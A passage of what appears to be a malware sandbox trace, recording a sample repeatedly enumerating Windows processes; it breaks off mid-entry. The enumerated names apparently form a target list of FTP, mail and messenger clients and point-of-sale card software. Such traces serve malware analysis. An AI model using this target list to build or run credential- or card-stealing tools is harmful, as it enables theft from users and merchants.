1 [0160.949] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.951] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.953] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0160.955] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0160.957] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0160.959] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0160.961] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0160.962] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0160.965] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0160.967] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0160.969] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0160.971] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0160.972] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0160.974] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0160.976] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0160.978] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0161.003] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0161.005] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0161.007] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0161.009] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0161.011] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0161.013] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0161.015] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0161.017] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0161.019] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0161.021] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0161.023] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0161.025] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0161.027] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0161.030] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0161.032] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0161.034] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0161.036] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0161.037] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0161.039] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0161.066] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0161.069] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0161.072] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0161.074] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0161.077] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0161.079] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0161.082] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0161.084] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0161.086] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0161.089] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0161.091] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0161.094] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0161.096] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0161.098] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0161.101] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0161.103] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0161.154] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0161.156] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0161.158] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0161.160] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0161.162] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unit.exe")) returned 1 [0161.165] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="military mission finish.exe")) returned 1 [0161.167] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0161.169] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0161.171] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0161.173] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0161.175] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0161.177] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0161.180] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0161.182] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0161.184] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0161.186] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0161.188] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0161.190] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.192] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0161.194] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.196] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0161.215] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf18, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 1 [0161.216] Process32Next (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf18, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 0 [0161.218] CloseHandle (hObject=0xb64) returned 1 [0161.218] Sleep (dwMilliseconds=0x64) [0161.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1060 [0161.374] Process32First (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.376] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.378] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.379] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.381] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.382] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.383] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.385] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.387] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.388] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, 